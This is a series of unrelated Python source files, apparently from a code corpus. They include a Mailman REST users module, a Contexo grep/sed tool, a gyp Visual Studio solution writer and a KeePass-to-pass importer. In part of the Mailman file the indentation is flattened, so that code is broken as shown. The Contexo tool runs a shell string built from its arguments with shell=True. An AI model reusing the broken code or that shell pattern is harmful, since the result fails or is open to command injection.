from subprocess import Popen
# Render NUMFRAMES rotated, downscaled copies of SRC into TMPDIR as the
# frames of a spinner animation.  (Python 2 script: uses xrange.)
SRC='img/reload.png'
TMPDIR='../../src/qt/res/movies/'
TMPNAME='spinner-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)

im_src = Image.open(SRC)

# Mirror the base image first so the negative rotations below yield a
# clockwise spin.
if CLOCKWISE:
    im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)

def frame_to_filename(frame):
    # Output path for a single animation frame.
    return path.join(TMPDIR, TMPNAME % frame)

frame_files = []
# Frames are offset by half a step so the first and last rotations are
# not identical when the animation loops.
for frame in xrange(NUMFRAMES):
    rotation = (frame + 0.5) / NUMFRAMES * 360.0
    if CLOCKWISE:
        rotation = -rotation
    im_new = im_src.rotate(rotation, Image.BICUBIC)
    im_new.thumbnail(DSIZE, Image.ANTIALIAS)
    outfile = frame_to_filename(frame)
    im_new.save(outfile, 'png')
    frame_files.append(outfile)
|
trevor/mailman3 | refs/heads/master | src/mailman/rest/users.py | 1 | # Copyright (C) 2011-2014 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""REST for users."""
from __future__ import absolute_import, print_function, unicode_literals
__metaclass__ = type
__all__ = [
'AUser',
'AllUsers',
]
from passlib.utils import generate_password as generate
from restish import http, resource
from uuid import UUID
from zope.component import getUtility
from mailman.config import config
from mailman.core.errors import (
ReadOnlyPATCHRequestError, UnknownPATCHRequestError)
from mailman.interfaces.address import ExistingAddressError
from mailman.interfaces.usermanager import IUserManager
from mailman.rest.addresses import UserAddresses
from mailman.rest.helpers import (
CollectionMixin, GetterSetter, PATCH, etag, no_content, paginate, path_to)
from mailman.rest.preferences import Preferences
from mailman.rest.validator import PatchValidator, Validator
# Attributes of a user which can be changed via the REST API.
class PasswordEncrypterGetterSetter(GetterSetter):
    """Getter/setter mapping 'cleartext_password' onto the user's
    encrypted 'password' attribute.

    Values written through ``put`` are encrypted with the site password
    context; ``get`` reads back the stored (already encrypted) password.
    """
    def __init__(self):
        super(PasswordEncrypterGetterSetter, self).__init__(
            config.password_context.encrypt)

    def get(self, obj, attribute):
        assert attribute == 'cleartext_password'
        # Bug fix: the superclass result must be returned -- without the
        # `return`, this getter always yielded None.
        return super(PasswordEncrypterGetterSetter, self).get(obj, 'password')

    def put(self, obj, attribute, value):
        assert attribute == 'cleartext_password'
        super(PasswordEncrypterGetterSetter, self).put(obj, 'password', value)
# Attributes of a user which can be changed via the REST API, mapped to
# the converter/encrypter applied on write.
ATTRIBUTES = dict(
    display_name=GetterSetter(unicode),
    cleartext_password=PasswordEncrypterGetterSetter(),
    )
class _UserBase(resource.Resource, CollectionMixin):
    """Shared base class for user representations."""

    def _resource_as_dict(self, user):
        """See `CollectionMixin`."""
        # The canonical URL for a user is their unique user id, although we
        # can always look up a user based on any registered and validated
        # email address associated with their account.  The user id is a
        # UUID, but we serialize its integer equivalent.
        user_id = user.user_id.int
        resource = dict(
            user_id=user_id,
            created_on=user.created_on,
            self_link=path_to('users/{0}'.format(user_id)),
            )
        # Add the password attribute, only if the user has a password.  Same
        # with the real name.  These could be None or the empty string.
        if user.password:
            resource['password'] = user.password
        if user.display_name:
            resource['display_name'] = user.display_name
        return resource

    @paginate
    def _get_collection(self, request):
        """See `CollectionMixin`."""
        return list(getUtility(IUserManager).users)
class AllUsers(_UserBase):
    """The users collection: GET lists all users, POST creates one."""

    @resource.GET()
    def collection(self, request):
        """/users"""
        resource = self._make_collection(request)
        return http.ok([], etag(resource))

    @resource.POST()
    def create(self, request):
        """Create a new user."""
        try:
            validator = Validator(email=unicode,
                                  display_name=unicode,
                                  password=unicode,
                                  _optional=('display_name', 'password'))
            arguments = validator(request)
        except ValueError as error:
            return http.bad_request([], str(error))
        # We can't pass the 'password' argument to the user creation method,
        # so strip that out (if it exists), then create the user, adding the
        # password after the fact if successful.
        password = arguments.pop('password', None)
        try:
            user = getUtility(IUserManager).create_user(**arguments)
        except ExistingAddressError as error:
            return http.bad_request(
                [], b'Address already exists: {0}'.format(error.address))
        if password is None:
            # This will have to be reset since it cannot be retrieved.
            password = generate(int(config.passwords.password_length))
        user.password = config.password_context.encrypt(password)
        location = path_to('users/{0}'.format(user.user_id.int))
        return http.created(location, [], None)
class AUser(_UserBase):
"""A user."""
def __init__(self, user_identifier):
    """Get a user by various type of identifiers.

    :param user_identifier: The identifier used to retrieve the user.  The
        identifier may either be an integer user-id, or an email address
        controlled by the user.  The type of identifier is auto-detected
        by looking for an `@` symbol, in which case it's taken as an email
        address, otherwise it's assumed to be an integer.
    :type user_identifier: string
    """
    user_manager = getUtility(IUserManager)
    if '@' in user_identifier:
        self._user = user_manager.get_user(user_identifier)
    else:
        # The identifier is the string representation of an integer that
        # must be converted to a UUID.
        try:
            user_id = UUID(int=int(user_identifier))
        except ValueError:
            # Not a valid integer: treat as user-not-found.
            self._user = None
        else:
            self._user = user_manager.get_user_by_id(user_id)
@resource.GET()
def user(self, request):
    """Return the JSON representation of this user, or 404 if unknown."""
    if self._user is None:
        return http.not_found()
    return http.ok([], self._resource_as_json(self._user))
@resource.child()
def addresses(self, request, segments):
"""/users/<uid>/addresses"""
if self._user is None:
return http.not_found()
return UserAddresses(self._user)
@resource.DELETE()
def delete_user(self, request):
"""Delete the named user, all her memberships, and addresses."""
if self._user is None:
return http.not_found()
for member in self._user.memberships.members:
member.unsubscribe()
user_manager = getUtility(IUserManager)
for address in self._user.addresses:
user_manager.delete_address(address)
user_manager.delete_user(self._user)
return no_content()
@resource.child()
def preferences(self, request, segments):
"""/addresses/<email>/preferences"""
if len(segments) != 0:
return http.bad_request()
if self._user is None:
return http.not_found()
child = Preferences(
self._user.preferences,
'users/{0}'.format(self._user.user_id.int))
return child, []
@PATCH()
def patch_update(self, request):
"""Patch the user's configuration (i.e. partial update)."""
if self._user is None:
return http.not_found()
try:
validator = PatchValidator(request, ATTRIBUTES)
except UnknownPATCHRequestError as error:
return http.bad_request(
[], b'Unknown attribute: {0}'.format(error.attribute))
except ReadOnlyPATCHRequestError as error:
return http.bad_request(
[], b'Read-only attribute: {0}'.format(error.attribute))
validator.update(self._user, request)
return no_content()
@resource.PUT()
def put_update(self, request):
"""Put the user's configuration (i.e. full update)."""
if self._user is None:
return http.not_found()
validator = Validator(**ATTRIBUTES)
try:
validator.update(self._user, request)
except UnknownPATCHRequestError as error:
return http.bad_request(
[], b'Unknown attribute: {0}'.format(error.attribute))
except ReadOnlyPATCHRequestError as error:
return http.bad_request(
[], b'Read-only attribute: {0}'.format(error.attribute))
except ValueError as error:
return http.bad_request([], str(error))
return no_content()
@resource.child('login')
def login(self, request, segments):
"""Log the user in, sort of, by verifying a given password."""
if self._user is None:
return http.not_found()
# We do not want to encrypt the plaintext password given in the POST
# data. That would hash the password, but we need to have the
# plaintext in order to pass into passlib.
validator = Validator(cleartext_password=GetterSetter(unicode))
try:
values = validator(request)
except ValueError as error:
return http.bad_request([], str(error))
is_valid, new_hash = config.password_context.verify(
values['cleartext_password'], self._user.password)
if is_valid:
if new_hash is not None:
self._user.password = new_hash
return no_content()
return http.forbidden()
|
scalado/contexo | refs/heads/master | contexo/cmdline/ctx2tengil.py | 1 | #!/usr/bin/env python
###############################################################################
# #
# ctx2make.py #
# Generate GNU Makefiles from Contexo views - (c) Scalado AB 2010 #
# #
# Authors: Thomas Eriksson (thomas.eriksson@scalado.com) #
# Ulf Holmstedt (ulf.holmstedt@scalado.com) #
# Manuel Astudillo (manuel.astudillo@scalado.com) #
# License GPL v2. See LICENSE.txt. #
# ------------ #
# #
# #
###############################################################################
# coding=UTF-8
# TODO:
# * change output dir to absolute path, -o argument?
#
# cygwin make does not handle mixed paths in target definitions well:
#
# C:/foo/bar.obj: C:/foo/bar.c
#
# instead we need to write them as:
# $(CYGPREFIX)/c/foo/bar.obj: $(CYGPREFIX)/c/foo/bar.c
#
# CYGPREFIX is set to /cygdrive if in cygwin, empty string if in MSYS
# this makes makefiles work on both cygwin and msys
#
# the compiler cannot handle cygwin/msys paths, so we need to retranslate them
# to mixed mode: cc -c C:/foo/bar.c -o C:/foo/bar.o
import tempfile
import logging
import logging.handlers
import os
import os.path
import sys
import shutil
import platform
import posixpath
import subprocess
from contexo import ctx2_common
from contexo import ctx_view
from contexo import ctx_cfg
from contexo import ctx_envswitch
from contexo import ctx_common
from contexo import ctx_comp
from contexo import ctx_sysinfo
from contexo import ctx_cmod
from contexo import ctx_base
from contexo import ctx_envswitch
from contexo import ctx_bc
from contexo import ctx_config
def main(argv):
    """Command-line entry point: parse argv and generate the Tengil file.

    Recognized options: -b <BCFILE>, -in <INPUT_NAME>, -on <OUTPUT_NAME>,
    -o <OUTPUT_FILE>.  All remaining arguments must be .comp files or
    @listfiles and are collected into buildItems.
    """
    buildItems = list()
    envFile = ""
    bcFile = ""
    addInc = ""
    outputDir = ""
    outputFile = ""
    outputName = ""
    inputName = ""
    viewDir = ""
    nextArgIsBC = False
    linkHeaders = True
    nextArgIsInputName = False
    nextArgIsOutputName = False
    nextArgIsOutputFile = False
    parsedAllOptions = False
    firstArg = True
    for arg in argv:
        # Skip argv[0], the program name.
        if firstArg:
            firstArg = False
            continue
        if arg == '-h':
            print >>sys.stderr, 'help:'
            print >>sys.stderr, '-b <BCFILE>, .bc file to use'
            print >>sys.stderr, '-in <INPUT_NAME>, input name'
            print >>sys.stderr, '-on <OUTPUT_NAME>, output name'
            print >>sys.stderr, '-o <OUTPUT_FILE>, resulting output file'
            sys.exit(1)
        # Consume the value for whichever option flag was seen last.
        if nextArgIsOutputName:
            outputName = arg
            nextArgIsOutputName = False
            continue
        if nextArgIsBC:
            bcFile = arg
            nextArgIsBC = False
            continue
        if nextArgIsInputName:
            inputName = arg
            nextArgIsInputName = False
            continue
        if nextArgIsOutputFile:
            outputFile = arg
            nextArgIsOutputFile = False
            continue
        if not parsedAllOptions:
            if arg == '-on':
                nextArgIsOutputName = True
                continue
            if arg == '-in':
                nextArgIsInputName = True
                continue
            if arg == '-o':
                nextArgIsOutputFile = True
                continue
            if arg == '-b':
                nextArgIsBC = True
                continue
            # First non-option argument: stop accepting options.
            parsedAllOptions = True
        # NOTE(review): the required-option checks below run once for every
        # positional argument, so all options must precede the first
        # comp/listfile argument on the command line.
        if outputFile == "":
            print >>sys.stderr, 'must have \'-o\' argument'
            sys.exit(1)
        if bcFile == "":
            print >>sys.stderr, 'must have -b argument'
            sys.exit(1)
        if outputName == "":
            print >>sys.stderr, 'must have \'-on\' argument'
            sys.exit(1)
        if inputName == "":
            print >>sys.stderr, 'must have \'-in\' argument'
            sys.exit(1)
        if arg[-5:] != ".comp" and arg[0] != '@':
            print >>sys.stderr, 'arguments must be either comp(s) or listfile(s) containing comp(s)'
            sys.exit(1)
        buildItems.append(arg)
    if len(buildItems) == 0:
        print >>sys.stderr, 'must have at least one listfile or comp file as argument'
        sys.exit(1)
    argDict = dict()
    genTengilFile(outputFile = outputFile, viewDir = viewDir, outputName = outputName, inputName = inputName, buildItems = buildItems, bcFile = bcFile)
    # NOTE(review): logging is configured only after all the work above is
    # done, so this DEBUG configuration has no effect on the run itself.
    logging.basicConfig(format = '%(asctime)s %(levelname)-8s %(message)s',
                        datefmt='%H:%M:%S',
                        level = logging.DEBUG);
def genTengilFile(outputFile = str(), viewDir = str(), outputName = str(), inputName = str(), buildItems = list(), bcFile = str()):
    """Generate a Tengil output file from a Contexo view.

    Stages the include and source files of the given comp items into a flat
    temporary directory, greps them for lines mentioning *inputName*
    (excluding '#define' lines) into *outputFile*, then rewrites every
    occurrence of *inputName* to *outputName* in place with sed.

    :param outputFile: path of the resulting file (grep/sed target).
    :param viewDir:    view directory, resolved via ctx2_common.get_view_dir.
    :param outputName: replacement symbol name written by sed.
    :param inputName:  symbol name searched for by grep.
    :param buildItems: comp files and/or @listfiles to process.
    :param bcFile:     build-configuration (.bc) file name.
    """
    launch_path = posixpath.abspath('.')
    view_dir = ctx2_common.get_view_dir(viewDir)
    obj_dir = view_dir + os.sep + '.ctx/obj'
    contexo_config_path = posixpath.join( ctx_common.getUserCfgDir(), ctx_sysinfo.CTX_CONFIG_FILENAME )
    cfgFile = ctx_cfg.CFGFile( contexo_config_path )
    cview = ctx_view.CTXView(view_dir, validate=False)
    bc = ctx2_common.getBuildConfiguration(cview, bcFile, cfgFile)
    comps = ctx2_common.expand_list_files(cview, buildItems)
    components = ctx2_common.create_components(comps, cview.getItemPaths('comp'), obj_dir, launch_path)
    # NOTE(review): 'modules' is collected but never used below; kept in case
    # comp.libraries access has side effects -- confirm before removing.
    modules = list()
    for comp in components:
        for library, compModules in comp.libraries.items():
            modules.extend(compModules)
    buildTests = True
    librarySources, includes = ctx2_common.parseComps(cview, view_dir, buildTests, bc, components)
    # Stage everything in one flat temp dir so a single shell glob can
    # grep all files at once.
    tempdir = tempfile.mkdtemp(prefix='ctx2tengil')
    try:
        for file in includes:
            shutil.copy(file, tempdir)
        for sources in librarySources.values():
            for file in sources:
                shutil.copy(file, tempdir)
        # NOTE(review): the command is a shell string built from arguments;
        # acceptable only because they come from this tool's own command line.
        args = " ".join(['grep', '-h', inputName, tempdir + os.sep + '*', '|', 'grep', '-v', '"#define"' + '>', outputFile])
        print(args)
        if subprocess.call(args, shell=True) != 0:
            sys.exit()
        args = " ".join(['sed', '-i', 's/' + inputName + '/' + outputName + '/g', outputFile])
        print(args)
        # Bug fix: the original compared the Popen *object* to 0, which is
        # always true, so the script exited after every sed run.  Compare the
        # actual return code instead.
        if subprocess.call(args, shell=True) != 0:
            sys.exit()
    finally:
        # Always remove the staging directory, also on the sys.exit() paths
        # (the original leaked it whenever a subprocess step failed).
        shutil.rmtree(tempdir)
main(sys.argv)
|
ampax/edx-platform | refs/heads/master | lms/djangoapps/debug/management/commands/__init__.py | 12133432 | |
matsumoto-r/synciga | refs/heads/master | src/tools/gyp/pylib/gyp/MSVSNew.py | 225 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""New implementation of Visual Studio project generation for SCons."""
import os
import random
import gyp.common
# hashlib is supplied as of Python 2.5 as the replacement interface for md5
# and other secure hashes. In 2.6, md5 is deprecated. Import hashlib if
# available, avoiding a deprecation warning under 2.6. Import md5 otherwise,
# preserving 2.4 compatibility.
try:
    import hashlib
    _new_md5 = hashlib.md5
except ImportError:
    import md5
    _new_md5 = md5.new
# _new_md5 is a version-agnostic factory for MD5 hash objects (see the
# hashlib/md5 compatibility comment above).
# Initialize random number generator
random.seed()
# GUIDs for project types
# These are the fixed Visual Studio solution-entry type GUIDs emitted in the
# .sln 'Project("<type-guid>")' lines; 'folder' denotes a solution folder.
ENTRY_TYPE_GUIDS = {
    'project': '{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}',
    'folder': '{2150E333-8FDC-42A3-9474-1A3956D46DE8}',
}
#------------------------------------------------------------------------------
# Helper functions
def MakeGuid(name, seed='msvs_new'):
  """Returns a GUID for the specified target name.

  Args:
    name: Target name.
    seed: Seed for MD5 hash.
  Returns:
    A GUID-like string deterministically derived from name and seed.

  The value depends only on (seed, name): the same inputs always yield the
  same GUID, so projects and solutions that refer to each other can compute
  the GUID independently, and a target's GUID never changes across rebuilds.
  """
  # MD5 of seed+name yields 32 uppercase hex digits, sliced into the
  # standard 8-4-4-4-12 GUID groups.
  digest = _new_md5(str(seed) + str(name)).hexdigest().upper()
  groups = (digest[0:8], digest[8:12], digest[12:16], digest[16:20],
            digest[20:32])
  return '{%s}' % '-'.join(groups)
#------------------------------------------------------------------------------
class MSVSSolutionEntry(object):
  """Base class for solution entries (MSVSFolder and MSVSProject)."""
  def __cmp__(self, other):
    # Sort by name then guid (so things are in order on vs2008).
    # NOTE: __cmp__ and the cmp() builtin are Python 2 only; this module
    # targets Python 2.
    return cmp((self.name, self.get_guid()), (other.name, other.get_guid()))
class MSVSFolder(MSVSSolutionEntry):
  """Folder in a Visual Studio project or solution."""
  def __init__(self, path, name = None, entries = None,
               guid = None, items = None):
    """Initializes the folder.

    Args:
      path: Full path to the folder.
      name: Name of the folder.
      entries: List of folder entries to nest inside this folder. May contain
          Folder or Project objects. May be None, if the folder is empty.
      guid: GUID to use for folder, if not None.
      items: List of solution items to include in the folder project. May be
          None, if the folder does not directly contain items.
    """
    if name:
      self.name = name
    else:
      # Use last layer.
      self.name = os.path.basename(path)
    self.path = path
    self.guid = guid
    # Copy passed lists (or set to empty lists)
    self.entries = sorted(list(entries or []))
    self.items = list(items or [])
    self.entry_type_guid = ENTRY_TYPE_GUIDS['folder']
  def get_guid(self):
    """Returns the folder GUID, lazily deriving a stable one from the path."""
    if self.guid is None:
      # Use consistent guids for folders (so things don't regenerate).
      self.guid = MakeGuid(self.path, seed='msvs_folder')
    return self.guid
#------------------------------------------------------------------------------
class MSVSProject(MSVSSolutionEntry):
  """Visual Studio project."""
  def __init__(self, path, name = None, dependencies = None, guid = None,
               spec = None, build_file = None, config_platform_overrides = None,
               fixpath_prefix = None):
    """Initializes the project.

    Args:
      path: Absolute path to the project file.
      name: Name of project. If None, the name will be the same as the base
          name of the project file.
      dependencies: List of other Project objects this project is dependent
          upon, if not None.
      guid: GUID to use for project, if not None.
      spec: Dictionary specifying how to build this project.
      build_file: Filename of the .gyp file that the vcproj file comes from.
      config_platform_overrides: optional dict of configuration platforms to
          used in place of the default for this target.
      fixpath_prefix: the path used to adjust the behavior of _fixpath
    """
    self.path = path
    self.guid = guid
    self.spec = spec
    self.build_file = build_file
    # Use project filename if name not specified
    self.name = name or os.path.splitext(os.path.basename(path))[0]
    # Copy passed lists (or set to empty lists)
    self.dependencies = list(dependencies or [])
    self.entry_type_guid = ENTRY_TYPE_GUIDS['project']
    if config_platform_overrides:
      self.config_platform_overrides = config_platform_overrides
    else:
      self.config_platform_overrides = {}
    self.fixpath_prefix = fixpath_prefix
    self.msbuild_toolset = None
  def set_dependencies(self, dependencies):
    """Replaces the dependency list with a copy of *dependencies*."""
    self.dependencies = list(dependencies or [])
  def get_guid(self):
    """Returns the project GUID, lazily deriving a stable one from the name."""
    if self.guid is None:
      # Set GUID from path
      # TODO(rspangler): This is fragile.
      # 1. We can't just use the project filename sans path, since there could
      #    be multiple projects with the same base name (for example,
      #    foo/unittest.vcproj and bar/unittest.vcproj).
      # 2. The path needs to be relative to $SOURCE_ROOT, so that the project
      #    GUID is the same whether it's included from base/base.sln or
      #    foo/bar/baz/baz.sln.
      # 3. The GUID needs to be the same each time this builder is invoked, so
      #    that we don't need to rebuild the solution when the project changes.
      # 4. We should be able to handle pre-built project files by reading the
      #    GUID from the files.
      self.guid = MakeGuid(self.name)
    return self.guid
  def set_msbuild_toolset(self, msbuild_toolset):
    """Records the msbuild toolset string used when emitting the project."""
    self.msbuild_toolset = msbuild_toolset
#------------------------------------------------------------------------------
class MSVSSolution:
  """Visual Studio solution."""
  def __init__(self, path, version, entries=None, variants=None,
               websiteProperties=True):
    """Initializes the solution.

    Args:
      path: Path to solution file.
      version: Format version to emit.
      entries: List of entries in solution. May contain Folder or Project
          objects. May be None, if the folder is empty.
      variants: List of build variant strings. If none, a default list will
          be used.
      websiteProperties: Flag to decide if the website properties section
          is generated.
    """
    self.path = path
    self.websiteProperties = websiteProperties
    self.version = version
    # Copy passed lists (or set to empty lists)
    self.entries = list(entries or [])
    if variants:
      # Copy passed list
      self.variants = variants[:]
    else:
      # Use default
      self.variants = ['Debug|Win32', 'Release|Win32']
    # TODO(rspangler): Need to be able to handle a mapping of solution config
    # to project config.  Should we be able to handle variants being a dict,
    # or add a separate variant_map variable?  If it's a dict, we can't
    # guarantee the order of variants since dict keys aren't ordered.
    # TODO(rspangler): Automatically write to disk for now; should delay until
    # node-evaluation time.  NOTE: constructing a solution therefore has the
    # side effect of writing the .sln file.
    self.Write()
  def Write(self, writer=gyp.common.WriteOnDiff):
    """Writes the solution file to disk.

    Raises:
      IndexError: An entry appears multiple times.
    """
    # Walk the entry tree and collect all the folders and projects.
    all_entries = set()
    entries_to_check = self.entries[:]
    while entries_to_check:
      e = entries_to_check.pop(0)
      # If this entry has been visited, nothing to do.
      if e in all_entries:
        continue
      all_entries.add(e)
      # If this is a folder, check its entries too.
      if isinstance(e, MSVSFolder):
        entries_to_check += e.entries
    all_entries = sorted(all_entries)
    # Open file and print header
    f = writer(self.path)
    f.write('Microsoft Visual Studio Solution File, '
            'Format Version %s\r\n' % self.version.SolutionVersion())
    f.write('# %s\r\n' % self.version.Description())
    # Project entries
    sln_root = os.path.split(self.path)[0]
    for e in all_entries:
      relative_path = gyp.common.RelativePath(e.path, sln_root)
      # msbuild does not accept an empty folder_name.
      # use '.' in case relative_path is empty.
      folder_name = relative_path.replace('/', '\\') or '.'
      f.write('Project("%s") = "%s", "%s", "%s"\r\n' % (
          e.entry_type_guid,          # Entry type GUID
          e.name,                     # Folder name
          folder_name,                # Folder name (again)
          e.get_guid(),               # Entry GUID
      ))
      # TODO(rspangler): Need a way to configure this stuff
      if self.websiteProperties:
        f.write('\tProjectSection(WebsiteProperties) = preProject\r\n'
                '\t\tDebug.AspNetCompiler.Debug = "True"\r\n'
                '\t\tRelease.AspNetCompiler.Debug = "False"\r\n'
                '\tEndProjectSection\r\n')
      if isinstance(e, MSVSFolder):
        if e.items:
          f.write('\tProjectSection(SolutionItems) = preProject\r\n')
          for i in e.items:
            f.write('\t\t%s = %s\r\n' % (i, i))
          f.write('\tEndProjectSection\r\n')
      if isinstance(e, MSVSProject):
        if e.dependencies:
          f.write('\tProjectSection(ProjectDependencies) = postProject\r\n')
          for d in e.dependencies:
            f.write('\t\t%s = %s\r\n' % (d.get_guid(), d.get_guid()))
          f.write('\tEndProjectSection\r\n')
      f.write('EndProject\r\n')
    # Global section
    f.write('Global\r\n')
    # Configurations (variants)
    f.write('\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n')
    for v in self.variants:
      f.write('\t\t%s = %s\r\n' % (v, v))
    f.write('\tEndGlobalSection\r\n')
    # Sort config guids for easier diffing of solution changes.
    config_guids = []
    config_guids_overrides = {}
    for e in all_entries:
      if isinstance(e, MSVSProject):
        config_guids.append(e.get_guid())
        config_guids_overrides[e.get_guid()] = e.config_platform_overrides
    config_guids.sort()
    f.write('\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n')
    for g in config_guids:
      for v in self.variants:
        nv = config_guids_overrides[g].get(v, v)
        # Pick which project configuration to build for this solution
        # configuration.
        f.write('\t\t%s.%s.ActiveCfg = %s\r\n' % (
            g,              # Project GUID
            v,              # Solution build configuration
            nv,             # Project build config for that solution config
        ))
        # Enable project in this solution configuration.
        f.write('\t\t%s.%s.Build.0 = %s\r\n' % (
            g,              # Project GUID
            v,              # Solution build configuration
            nv,             # Project build config for that solution config
        ))
    f.write('\tEndGlobalSection\r\n')
    # TODO(rspangler): Should be able to configure this stuff too (though I've
    # never seen this be any different)
    f.write('\tGlobalSection(SolutionProperties) = preSolution\r\n')
    f.write('\t\tHideSolutionNode = FALSE\r\n')
    f.write('\tEndGlobalSection\r\n')
    # Folder mappings
    # TODO(rspangler): Should omit this section if there are no folders
    f.write('\tGlobalSection(NestedProjects) = preSolution\r\n')
    for e in all_entries:
      if not isinstance(e, MSVSFolder):
        continue        # Does not apply to projects, only folders
      for subentry in e.entries:
        f.write('\t\t%s = %s\r\n' % (subentry.get_guid(), e.get_guid()))
    f.write('\tEndGlobalSection\r\n')
    f.write('EndGlobal\r\n')
    f.close()
|
ampling/pass | refs/heads/passmenu_multi-clip | contrib/importers/keepass2pass.py | 11 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Stefan Simroth <stefan.simroth@gmail.com>. All Rights Reserved.
# Based on the script for KeepassX by Juhamatti Niemelä <iiska@iki.fi>.
# This file is licensed under the GPLv2+. Please see COPYING for more information.
#
# Usage:
# ./keepass2pass.py -f export.xml
# By default, takes the name of the root element and puts all passwords in there, but you can disable this:
# ./keepass2pass.py -f export.xml -r ""
# Or you can use another root folder:
# ./keepass2pass.py -f export.xml -r foo
#
# Features:
# * This script can handle duplicates and will merge them.
# * Besides the password also the fields 'UserName', 'URL' and 'Notes' (comment) will be inserted.
# * You get a warning if an entry has no password, but it will still insert it.
import getopt, sys
from subprocess import Popen, PIPE
from xml.etree import ElementTree
def pass_import_entry(path, data):
    """ Import new password entry to password-store using pass insert command """
    # Feed the multiline entry to `pass insert` on stdin, UTF-8 encoded.
    proc = Popen(['pass', 'insert', '--multiline', path], stdin=PIPE, stdout=PIPE)
    proc.communicate(data.encode('utf8'))
    # NOTE(review): the exit status of `pass` is not checked; a failed insert
    # is silently ignored.
    proc.wait()
def get_value(elements, node_text):
    """Return the <Value> text of the first element whose <Key> matches.

    *elements* is an iterable of KeePass2 <String> elements, each holding a
    <Key>/<Value> pair.  Returns '' when no key equals *node_text*; note the
    matched <Value> text itself may still be None for empty values.
    """
    for candidate in elements:
        if any(key.text == node_text for key in candidate.findall('Key')):
            return candidate.find('Value').text
    return ''
def path_for(element, path=''):
    """Build the password-store path for *element* beneath *path*.

    Entries are named by their 'Title' string field, groups by their <Name>
    child; any other tag yields an empty title.  The title is appended to
    *path* with '/' unless *path* is empty.
    """
    tag = element.tag
    if tag == 'Entry':
        title = get_value(element.findall("String"), "Title")
    elif tag == 'Group':
        title = element.find('Name').text
    else:
        title = ''
    return title if path == '' else '/'.join([path, title])
def password_data(element, path=''):
    """ Return password data and additional info if available from password entry element. """
    data = ""
    password = get_value(element.findall('String'), 'Password')
    # NOTE(review): get_value returns '' (not None) when the key is missing,
    # so the warning below only fires for an empty <Value> element -- confirm
    # that is the intended behavior.
    if password is not None: data = password + "\n"
    else:
        print "[WARN] No password: %s" % path_for(element, path)
    # NOTE(review): this passes the Entry element itself (not
    # element.findall('String')); it works because iterating an Element
    # yields its children, which get_value then inspects.
    for field in ['UserName', 'URL', 'Notes']:
        value = get_value(element, field)
        if value is not None and not len(value) == 0:
            data = "%s%s: %s\n" % (data, field, value)
    return data
def import_entry(entries, element, path=''):
    """Store *element*'s password data in *entries*, merging duplicates."""
    element_path = path_for(element, path)
    if entries.has_key(element_path):  # has_key is Python 2 only
        print "[INFO] Duplicate needs merging: %s" % element_path
        existing_data = entries[element_path]
        # NOTE(review): this branch calls password_data(element) without the
        # path argument, unlike the non-duplicate branch below -- only the
        # warning message formatting differs; confirm intended.
        data = "%s---------\nPassword: %s" % (existing_data, password_data(element))
    else:
        data = password_data(element, path)
    entries[element_path] = data
def import_group(entries, element, path='', npath=None):
    """Recursively collect password entries from *element* and its sub-groups.

    *npath*, when given, overrides the computed group path; the top-level
    caller uses it to substitute a custom root path for the root group.
    """
    base = path_for(element, path) if npath is None else npath
    for child_group in element.findall('Group'):
        import_group(entries, child_group, base)
    for child_entry in element.findall('Entry'):
        import_entry(entries, child_entry, base)
def import_passwords(xml_file, root_path=None):
    """ Parse given Keepass2 XML file and import password groups from it """
    print "[>>>>] Importing passwords from file %s" % xml_file
    print "[INFO] Root path: %s" % root_path
    entries = dict()
    with open(xml_file) as xml:
        text = xml.read()
    xml_tree = ElementTree.XML(text)
    root = xml_tree.find('Root')
    root_group = root.find('Group')
    # Collect all entries first (merging duplicates), then insert them into
    # pass in sorted path order.
    import_group(entries, root_group, '', root_path)
    password_count = 0
    for path, data in sorted(entries.iteritems()):  # iteritems: Python 2 only
        sys.stdout.write("[>>>>] Importing %s ... " % path.encode("utf-8"))
        pass_import_entry(path, data)
        sys.stdout.write("OK\n")
        password_count += 1
    print "[ OK ] Done. Imported %i passwords." % password_count
def usage():
    """ Print usage """
    # Written to stdout; callers exit with status 2 afterwards.
    print "Usage: %s -f XML_FILE" % (sys.argv[0])
    print "Optional:"
    print " -r ROOT_PATH Different root path to use than the one in xml file, use \"\" for none"
def main(argv):
    """Parse options (-f XML_FILE [-r ROOT_PATH]) and run the import."""
    try:
        opts, args = getopt.gnu_getopt(argv, "f:r:")
    except getopt.GetoptError as err:
        print str(err)
        usage()
        sys.exit(2)
    xml_file = None
    root_path = None
    # NOTE(review): `opt in "-f"` is substring matching, not equality; it
    # works here only because opts can contain just "-f" and "-r".
    for opt, arg in opts:
        if opt in "-f":
            xml_file = arg
        if opt in "-r":
            root_path = arg
    if xml_file is not None:
        import_passwords(xml_file, root_path)
    else:
        usage()
        sys.exit(2)
# Script entry point: strip the program name before handing argv to main().
if __name__ == '__main__':
    main(sys.argv[1:])
|
wdwvt1/scikit-bio | refs/heads/master | skbio/sequence/tests/test_iupac_sequence.py | 3 | # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import six
from unittest import TestCase, main
import numpy as np
import numpy.testing as npt
from skbio.sequence._iupac_sequence import IUPACSequence
from skbio.util._decorator import classproperty
class ExampleIUPACSequence(IUPACSequence):
    """Minimal concrete IUPACSequence used as the test fixture: alphabet
    {A, B, C} with degenerates X=AB, Y=BC, Z=AC."""
    @classproperty
    def degenerate_map(cls):
        # Maps each degenerate character to the set of characters it stands for.
